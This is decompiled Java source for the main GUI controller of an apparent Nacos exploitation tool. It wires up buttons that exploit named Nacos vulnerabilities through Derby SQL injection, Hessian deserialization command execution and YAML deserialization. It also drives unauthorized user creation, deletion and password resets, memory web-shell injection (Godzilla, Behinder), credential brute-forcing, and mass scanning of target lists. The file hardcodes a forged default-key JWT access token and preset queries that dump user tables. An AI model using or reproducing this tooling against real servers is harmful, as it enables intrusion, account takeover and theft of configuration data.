package com.alibaba.nacos.controller;

import ch.qos.logback.core.pattern.color.ANSIConstants;
import com.alibaba.nacos.common.NacosExploit;
import com.alibaba.nacos.common.NacosInfo;
import com.alibaba.nacos.entity.ExecutionResult;
import com.alibaba.nacos.entity.TableViewResult;
import com.alibaba.nacos.entity.Vulnerability;
import com.alibaba.nacos.service.VulBatchCheckTask;
import com.alibaba.nacos.service.VulExploitTask;
import com.alibaba.nacos.service.VulScanTask;
import com.alibaba.nacos.utils.DialogUtils;
import com.alibaba.nacos.utils.ExpList;
import com.alibaba.nacos.utils.ExportUtils;
import com.alibaba.nacos.utils.FileImportManager;
import com.alibaba.nacos.utils.Logger;
import com.alibaba.nacos.utils.URLParser;
import com.alipay.remoting.config.Configs;
import java.awt.Desktop;
import java.io.File;
import java.net.URI;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.Objects;
import javafx.collections.FXCollections;
import javafx.event.ActionEvent;
import javafx.fxml.FXML;
import javafx.scene.control.Button;
import javafx.scene.control.ComboBox;
import javafx.scene.control.ContextMenu;
import javafx.scene.control.MenuItem;
import javafx.scene.control.ProgressBar;
import javafx.scene.control.SingleSelectionModel;
import javafx.scene.control.Tab;
import javafx.scene.control.TableColumn;
import javafx.scene.control.TableView;
import javafx.scene.control.TextArea;
import javafx.scene.control.TextField;
import javafx.scene.control.cell.PropertyValueFactory;
import javafx.scene.input.Clipboard;
import javafx.scene.input.ClipboardContent;
import javafx.stage.FileChooser;
import javafx.stage.Stage;
import javax.xml.transform.OutputKeys;
import org.apache.commons.codec.language.bm.Rule;
import org.apache.commons.io.IOUtils;
import org.apache.commons.math3.optimization.direct.CMAESOptimizer;

/* loaded from: input_file:com/alibaba/nacos/controller/MainController.class */
public class MainController {

    @FXML
    private TextArea txt_exploit_result;

    @FXML
    private TextArea txt_yaml_result;

    @FXML
    private TextArea txt_brute_result;

    @FXML
    private TextArea txt_vul_check;

    @FXML
    private TextArea txt_cmd_result;

    @FXML
    private TextArea txt_vul_desc;

    @FXML
    private TextArea txt_sqli_result;

    @FXML
    private TextArea txt_vul_batch_check;

    @FXML
    private TextField txt_target_url;

    @FXML
    private TextField txt_dataId;

    @FXML
    private TextField txt_group;

    @FXML
    private TextField txt_jar_path;

    @FXML
    private TextField txt_accessToken;

    @FXML
    private TextField txt_cmd;

    @FXML
    private TextField txt_user;

    @FXML
    private TextField txt_pwd;

    @FXML
    private TextField txt_nacos_path;

    @FXML
    private TextField txt_nacos_version;

    @FXML
    private TextField txt_jraftIP;

    @FXML
    private TextField txt_jraftPort;

    @FXML
    private TextField txt_shell_pwd;

    @FXML
    private TextField txt_url_file;

    @FXML
    private TextField txt_brute_user;

    @FXML
    private TextField txt_brute_pwd;

    @FXML
    private ComboBox<String> comboBox_vul;

    @FXML
    private ComboBox<String> comboBox_nacos_type;

    @FXML
    private ComboBox<String> comboBox_sqli;

    @FXML
    private ComboBox<String> comboBox_filtershell;

    @FXML
    private ComboBox<String> comboBox_thread;

    @FXML
    private Tab tab_vul_check;

    @FXML
    private Tab tab_vul_desc;

    @FXML
    private Button btn_import_url;

    @FXML
    private Button btn_import_pwd;

    @FXML
    private Button btn_import_user;

    @FXML
    private TableView<TableViewResult> resultTableView;

    @FXML
    private TableColumn<TableViewResult, String> Column_id;

    @FXML
    private TableColumn<TableViewResult, String> Column_url;

    @FXML
    private TableColumn<TableViewResult, String> Column_version;

    @FXML
    private TableColumn<TableViewResult, String> Column_vulName;

    @FXML
    private ProgressBar progressBar;
    public static Map<String, String> currentProxy = new HashMap();
    private Stage mainStage;

    public void initialize() {
        this.Column_id.setCellValueFactory(new PropertyValueFactory("id"));
        this.Column_url.setCellValueFactory(new PropertyValueFactory("url"));
        this.Column_version.setCellValueFactory(new PropertyValueFactory(OutputKeys.VERSION));
        this.Column_vulName.setCellValueFactory(new PropertyValueFactory("vulName"));
        this.comboBox_vul.setValue(Rule.ALL);
        this.comboBox_vul.getItems().add(Rule.ALL);
        this.comboBox_vul.getItems().addAll(ExpList.get_exp());
        this.comboBox_thread.setValue("100");
        this.comboBox_thread.getItems().addAll("1", Configs.TP_MIN_SIZE_DEFAULT, ANSIConstants.BLACK_FG, Configs.CONN_CREATE_TP_QUEUE_SIZE_DEFAULT, "100", "150", "200");
        this.txt_nacos_path.setText("未启动");
        this.txt_cmd.setText("whoami");
        this.txt_jraftPort.setText("7848");
        this.txt_shell_pwd.setText("暂不支持自定义");
        this.txt_group.setText("DEFAULT_GROUP");
        this.txt_accessToken.setText("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q");
        this.txt_vul_desc.setEditable(false);
        this.txt_vul_check.setEditable(false);
        this.txt_vul_batch_check.setEditable(false);
        this.comboBox_thread.setEditable(false);
        this.txt_url_file.setEditable(false);
        this.txt_exploit_result.setEditable(false);
        this.txt_nacos_path.setEditable(false);
        this.txt_nacos_version.setEditable(false);
        this.txt_sqli_result.setEditable(false);
        this.txt_cmd_result.setEditable(false);
        this.txt_shell_pwd.setEditable(false);
        this.txt_brute_pwd.setEditable(false);
        this.txt_brute_user.setEditable(false);
        this.txt_yaml_result.setEditable(false);
        this.txt_brute_result.setEditable(false);
        this.comboBox_nacos_type.setItems(FXCollections.observableArrayList("windows", "linux"));
        this.comboBox_nacos_type.setValue("linux");
        this.comboBox_filtershell.setItems(FXCollections.observableArrayList(Rule.ALL, "CMD马", "哥斯拉", "冰蝎"));
        this.comboBox_filtershell.setValue(Rule.ALL);
        this.comboBox_sqli.setItems(FXCollections.observableArrayList("select * from users", "select * from permissions", "select * from roles", "select * from tenant_info", "select * from tenant_capacity", "select * from group_capacity", "select * from config_tags_relation", "select * from app_configdata_relation_pubs", "select * from app_configdata_relation_subs", "select * from app_list", "select * from config_info_aggr", "select * from config_info_tag", "select * from config_info_beta", "select * from his_config_info", "select * from config_info"));
        this.comboBox_sqli.setValue("select * from users");
    }

    @FXML
    void proxy_set(ActionEvent actionEvent) {
        ProxyController.createProxyUI(currentProxy);
    }

    @FXML
    void clear(ActionEvent actionEvent) {
        this.txt_exploit_result.clear();
        this.txt_nacos_path.clear();
        this.txt_nacos_version.clear();
        this.txt_cmd_result.clear();
        this.txt_sqli_result.clear();
        this.txt_vul_check.clear();
        this.txt_vul_desc.clear();
        this.txt_brute_result.clear();
        this.txt_vul_batch_check.clear();
        this.resultTableView.getItems().clear();
        this.progressBar.setProgress(CMAESOptimizer.DEFAULT_STOPFITNESS);
        this.txt_yaml_result.clear();
    }

    @FXML
    void showContactAuthor(ActionEvent actionEvent) {
        DialogUtils.showContactAuthorDialog();
    }

    @FXML
    void get_vul_description(ActionEvent actionEvent) {
        this.tab_vul_desc.getTabPane().getSelectionModel().select((SingleSelectionModel<Tab>) this.tab_vul_desc);
        String selectedItem = this.comboBox_vul.getSelectionModel().getSelectedItem();
        if (!selectedItem.startsWith(Rule.ALL)) {
            this.txt_vul_desc.setText(IOUtils.LINE_SEPARATOR_UNIX + ExpList.getPayload(selectedItem).getInfo());
            return;
        }
        ArrayList arrayList = (ArrayList) ExpList.get_exp();
        this.txt_vul_desc.setText("");
        Iterator it = arrayList.iterator();
        while (it.hasNext()) {
            this.txt_vul_desc.appendText(ExpList.getPayload((String) it.next()).getInfo() + "=================================================================\n");
        }
    }

    @FXML
    void vul_scan(ActionEvent actionEvent) {
        Button button = (Button) actionEvent.getSource();
        button.setDisable(true);
        String text = this.txt_target_url.getText();
        boolean checkTheURL = URLParser.checkTheURL(text);
        this.tab_vul_check.getTabPane().getSelectionModel().select((SingleSelectionModel<Tab>) this.tab_vul_check);
        String baseUrl = URLParser.getBaseUrl(this.txt_nacos_path.getText());
        if (Objects.equals(baseUrl, text)) {
            this.txt_jraftIP.setText(URLParser.getHost(baseUrl));
            new Thread(new VulScanTask(this.comboBox_vul, this.txt_nacos_path, this.txt_vul_check)).start();
        } else if (checkTheURL) {
            String str = NacosInfo.get_nacos_url(URLParser.resetURL(text), URLParser.getUri(text));
            if (str != null) {
                this.txt_nacos_path.setText(str);
                this.txt_nacos_version.setText(NacosInfo.get_version(str));
                this.txt_jraftIP.setText(URLParser.getHost(str));
                new Thread(new VulScanTask(this.comboBox_vul, this.txt_nacos_path, this.txt_vul_check)).start();
            } else {
                this.txt_nacos_path.setText("未识别出Nacos的指纹,不启动漏洞扫描");
                this.txt_nacos_version.setText("");
            }
        }
        button.setDisable(false);
    }

    @FXML
    void instruction(ActionEvent actionEvent) {
        DialogUtils.showInformationDialog("提示", null, "师傅们觉得好用的话就点点Star, 后续会继续优化及其poc添加");
    }

    @FXML
    void address(ActionEvent actionEvent) {
        try {
            Desktop.getDesktop().browse(new URI("https://github.com/charonlight/NacosExploitGUI"));
        } catch (Exception e) {
            DialogUtils.showErrorDialog("错误", "发生错误", "无法打开默认浏览器，请手动访问 https://github.com/charonlight");
        }
    }

    @FXML
    void add_user(ActionEvent actionEvent) throws Exception {
        String text = this.txt_nacos_path.getText();
        if (VulExploitTask.check_scan_end(text)) {
            NacosExploit.exploit("add_user", this.comboBox_vul.getSelectionModel().getSelectedItem(), text, this.txt_user.getText(), this.txt_pwd.getText(), this.txt_exploit_result);
        }
    }

    @FXML
    void del_user(ActionEvent actionEvent) throws Exception {
        String text = this.txt_nacos_path.getText();
        if (VulExploitTask.check_scan_end(text)) {
            NacosExploit.exploit("del_user", this.comboBox_vul.getSelectionModel().getSelectedItem(), text, this.txt_user.getText(), this.txt_pwd.getText(), this.txt_exploit_result);
        }
    }

    @FXML
    void reset_pwd(ActionEvent actionEvent) throws Exception {
        String text = this.txt_nacos_path.getText();
        if (VulExploitTask.check_scan_end(text)) {
            NacosExploit.exploit("reset_pwd", this.comboBox_vul.getSelectionModel().getSelectedItem(), text, this.txt_user.getText(), this.txt_pwd.getText(), this.txt_exploit_result);
        }
    }

    @FXML
    void exec_sqli(ActionEvent actionEvent) throws Exception {
        if (VulExploitTask.check_scan_end(this.txt_nacos_path.getText())) {
            String selectedItem = this.comboBox_vul.getSelectionModel().getSelectedItem();
            if (!selectedItem.equals("Nacos Derby SQL 注入漏洞(CNVD-2020-67618)")) {
                DialogUtils.showErrorDialog("提示", "漏洞选择错误", "请选择能利用的漏洞Nacos Derby SQL注入漏洞");
                return;
            }
            String text = this.txt_nacos_path.getText();
            String selectedItem2 = this.comboBox_sqli.getSelectionModel().getSelectedItem();
            ExecutionResult exploit = ExpList.getPayload(selectedItem).exploit(text, selectedItem2);
            if (exploit.getResult()) {
                Logger.logInfo(this.txt_sqli_result, selectedItem2 + IOUtils.LINE_SEPARATOR_UNIX + exploit.getResponse());
            } else {
                Logger.logInfo(this.txt_sqli_result, "漏洞利用失败");
            }
        }
    }

    @FXML
    void check_shell(ActionEvent actionEvent) throws Exception {
        String text = this.txt_nacos_path.getText();
        if (VulExploitTask.check_scan_end(text)) {
            String selectedItem = this.comboBox_vul.getSelectionModel().getSelectedItem();
            String selectedItem2 = this.comboBox_nacos_type.getSelectionModel().getSelectedItem();
            if (!selectedItem.equals("Nacos Jraft Hessian 反序列化漏洞(CNVD-2023-45001)")) {
                DialogUtils.showErrorDialog("提示", "漏洞选择错误", "请选择能利用的漏洞(Nacos Jraft Hessian反序列化漏洞");
                return;
            }
            ExecutionResult exploit = ExpList.getPayload(selectedItem).exploit(text, "check_shell", this.txt_cmd.getText(), this.txt_jraftIP.getText(), this.txt_jraftPort.getText(), selectedItem2);
            if (exploit.getResult()) {
                Logger.logInfo(this.txt_cmd_result, exploit.getResponse());
            } else {
                Logger.logInfo(this.txt_cmd_result, "漏洞利用失败");
            }
        }
    }

    @FXML
    void execute_cmd(ActionEvent actionEvent) throws Exception {
        String text = this.txt_nacos_path.getText();
        if (VulExploitTask.check_scan_end(text)) {
            String selectedItem = this.comboBox_vul.getSelectionModel().getSelectedItem();
            String selectedItem2 = this.comboBox_nacos_type.getSelectionModel().getSelectedItem();
            if (!selectedItem.equals("Nacos Jraft Hessian 反序列化漏洞(CNVD-2023-45001)")) {
                DialogUtils.showErrorDialog("提示", "漏洞选择错误", "请选择能利用的漏洞(Nacos Jraft Hessian反序列化(CNVD-2023-45001))");
                return;
            }
            ExecutionResult exploit = ExpList.getPayload(selectedItem).exploit(text, "execute_cmd", this.txt_cmd.getText(), this.txt_jraftIP.getText(), this.txt_jraftPort.getText(), selectedItem2);
            if (exploit.getResult()) {
                Logger.logInfo(this.txt_cmd_result, exploit.getResponse());
            } else {
                Logger.logInfo(this.txt_cmd_result, "漏洞利用失败");
            }
        }
    }

    @FXML
    void filter_shell_inject(ActionEvent actionEvent) throws Exception {
        String text = this.txt_nacos_path.getText();
        if (VulExploitTask.check_scan_end(text)) {
            String selectedItem = this.comboBox_vul.getSelectionModel().getSelectedItem();
            String selectedItem2 = this.comboBox_nacos_type.getSelectionModel().getSelectedItem();
            if (!selectedItem.equals("Nacos Jraft Hessian 反序列化漏洞(CNVD-2023-45001)")) {
                DialogUtils.showErrorDialog("提示", "漏洞选择错误", "请选择能利用的漏洞(Nacos Jraft Hessian反序列化漏洞");
                return;
            }
            ExecutionResult exploit = ExpList.getPayload(selectedItem).exploit(text, "filter_shell_inject", this.txt_cmd.getText(), this.txt_jraftIP.getText(), this.txt_jraftPort.getText(), selectedItem2);
            if (exploit.getResult()) {
                Logger.logInfo(this.txt_cmd_result, exploit.getResponse());
            } else {
                Logger.logInfo(this.txt_cmd_result, "漏洞利用失败");
            }
        }
    }

    @FXML
    public void batch_import_url() {
        Stage stage = (Stage) this.btn_import_url.getScene().getWindow();
        FileChooser fileChooser = new FileChooser();
        fileChooser.setTitle("Select URL File");
        fileChooser.getExtensionFilters().add(new FileChooser.ExtensionFilter("TXT files (*.txt)", "*.txt"));
        File showOpenDialog = fileChooser.showOpenDialog(stage);
        if (showOpenDialog != null) {
            if (!showOpenDialog.getName().toLowerCase().endsWith(".txt")) {
                DialogUtils.showInformationDialog("提示", "错误提示", "请选择一个TXT文件！");
            } else {
                this.txt_url_file.setText(showOpenDialog.getAbsolutePath());
                DialogUtils.showInformationDialog("提示", "导入提示", "成功导入" + URLParser.read_file_url(showOpenDialog.getAbsolutePath()).size() + "行数据！");
            }
        }
    }

    @FXML
    public void batch_import_user() {
        Stage stage = (Stage) this.btn_import_user.getScene().getWindow();
        FileChooser fileChooser = new FileChooser();
        fileChooser.setTitle("Select URL File");
        fileChooser.getExtensionFilters().add(new FileChooser.ExtensionFilter("TXT files (*.txt)", "*.txt"));
        File showOpenDialog = fileChooser.showOpenDialog(stage);
        if (showOpenDialog != null) {
            if (!showOpenDialog.getName().toLowerCase().endsWith(".txt")) {
                DialogUtils.showInformationDialog("提示", "错误提示", "请选择一个TXT文件！");
            } else {
                this.txt_brute_user.setText(showOpenDialog.getAbsolutePath());
                DialogUtils.showInformationDialog("提示", "导入提示", "成功导入" + URLParser.read_file_url(showOpenDialog.getAbsolutePath()).size() + "行数据！");
            }
        }
    }

    @FXML
    public void batch_import_pwd() {
        Stage stage = (Stage) this.btn_import_pwd.getScene().getWindow();
        FileChooser fileChooser = new FileChooser();
        fileChooser.setTitle("Select URL File");
        fileChooser.getExtensionFilters().add(new FileChooser.ExtensionFilter("TXT files (*.txt)", "*.txt"));
        File showOpenDialog = fileChooser.showOpenDialog(stage);
        if (showOpenDialog != null) {
            if (!showOpenDialog.getName().toLowerCase().endsWith(".txt")) {
                DialogUtils.showInformationDialog("提示", "错误提示", "请选择一个TXT文件！");
            } else {
                this.txt_brute_pwd.setText(showOpenDialog.getAbsolutePath());
                DialogUtils.showInformationDialog("提示", "导入提示", "成功导入" + URLParser.read_file_url(showOpenDialog.getAbsolutePath()).size() + "行数据！");
            }
        }
    }

    @FXML
    public void vul_batch_scan(ActionEvent actionEvent) throws Exception {
        String text = this.txt_url_file.getText();
        int parseInt = Integer.parseInt(this.comboBox_thread.getSelectionModel().getSelectedItem());
        ArrayList arrayList = new ArrayList(new HashSet(URLParser.read_file_url(text)));
        this.progressBar.setProgress(CMAESOptimizer.DEFAULT_STOPFITNESS);
        Button button = (Button) actionEvent.getSource();
        button.setDisable(true);
        VulBatchCheckTask vulBatchCheckTask = new VulBatchCheckTask(arrayList, this.comboBox_vul, this.txt_vul_batch_check, this.resultTableView, this.progressBar, button, parseInt);
        ContextMenu contextMenu = new ContextMenu();
        MenuItem menuItem = new MenuItem("Copy URL");
        menuItem.setOnAction(actionEvent2 -> {
            TableViewResult selectedItem = this.resultTableView.getSelectionModel().getSelectedItem();
            if (selectedItem != null) {
                String url = selectedItem.getUrl();
                Clipboard systemClipboard = Clipboard.getSystemClipboard();
                ClipboardContent clipboardContent = new ClipboardContent();
                clipboardContent.putString(url);
                systemClipboard.setContent(clipboardContent);
            }
        });
        contextMenu.getItems().add(menuItem);
        this.resultTableView.setContextMenu(contextMenu);
        Thread thread = new Thread(vulBatchCheckTask);
        thread.setDaemon(true);
        thread.start();
    }

    @FXML
    void exportToExcel(ActionEvent actionEvent) {
        ExportUtils.exportToExcel(this.resultTableView.getItems());
    }

    @FXML
    void brute_force_attack(ActionEvent actionEvent) {
        String text = this.txt_brute_user.getText();
        String text2 = this.txt_brute_pwd.getText();
        String text3 = this.txt_nacos_path.getText();
        String text4 = this.txt_nacos_path.getText();
        if (VulExploitTask.check_scan_end(text3)) {
            String selectedItem = this.comboBox_vul.getSelectionModel().getSelectedItem();
            try {
                List<String> read_file = FileImportManager.read_file(text);
                List<String> read_file2 = FileImportManager.read_file(text2);
                Vulnerability payload = ExpList.getPayload(selectedItem);
                for (String str : read_file) {
                    for (String str2 : read_file2) {
                        Logger.logInfo(this.txt_brute_result, "开始爆破-----用户名: " + str + "爆破密码: " + str2);
                        ExecutionResult exploit = payload.exploit(text4, str, str2);
                        if (exploit.getResult()) {
                            Logger.logInfo(this.txt_brute_result, "爆破成功(" + str + "," + str2 + ")\n" + exploit.getResponse());
                            DialogUtils.showInformationDialog("提示", "爆破成功", "发现Nacos控制台弱口令 : (" + str + "," + str2 + ")");
                            return;
                        }
                    }
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }

    @FXML
    void client_yaml_deser(ActionEvent actionEvent) throws Exception {
        String text = this.txt_nacos_path.getText();
        if (VulExploitTask.check_scan_end(text)) {
            String selectedItem = this.comboBox_vul.getSelectionModel().getSelectedItem();
            this.comboBox_nacos_type.getSelectionModel().getSelectedItem();
            if (!selectedItem.equals("Nacos-Client Yaml 反序列化漏洞")) {
                DialogUtils.showErrorDialog("提示", "漏洞选择错误", "请选择能利用的漏洞(Nacos-Client Yaml 反序列化漏洞)");
                return;
            }
            ExecutionResult exploit = ExpList.getPayload(selectedItem).exploit(text, this.txt_dataId.getText(), this.txt_group.getText(), this.txt_accessToken.getText(), this.txt_jar_path.getText());
            if (exploit.getResult()) {
                Logger.logInfo(this.txt_yaml_result, exploit.getResponse());
            } else {
                Logger.logInfo(this.txt_yaml_result, "漏洞利用失败");
            }
        }
    }
}
